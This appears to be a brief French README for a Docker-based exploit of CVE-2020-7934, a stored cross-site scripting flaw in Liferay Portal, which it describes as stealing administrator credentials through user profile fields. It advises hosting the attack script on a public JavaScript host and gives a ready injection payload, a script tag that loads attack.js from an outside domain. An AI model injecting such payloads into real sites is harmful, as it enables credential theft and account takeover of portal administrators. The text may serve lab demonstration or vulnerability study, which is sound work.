
Exploit XSS basé sur Docker pour CVE-2020-7934 ciblant le portail Liferay. Démontre un cross-site scripting stocké via les champs de profil utilisateur pour voler les identifiants administrateur.
Il est possible de mettre le script d'attaque en ligne (via le code js) http://yourjavascript.com/
Notre script Js en ligne pour l'attaque
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>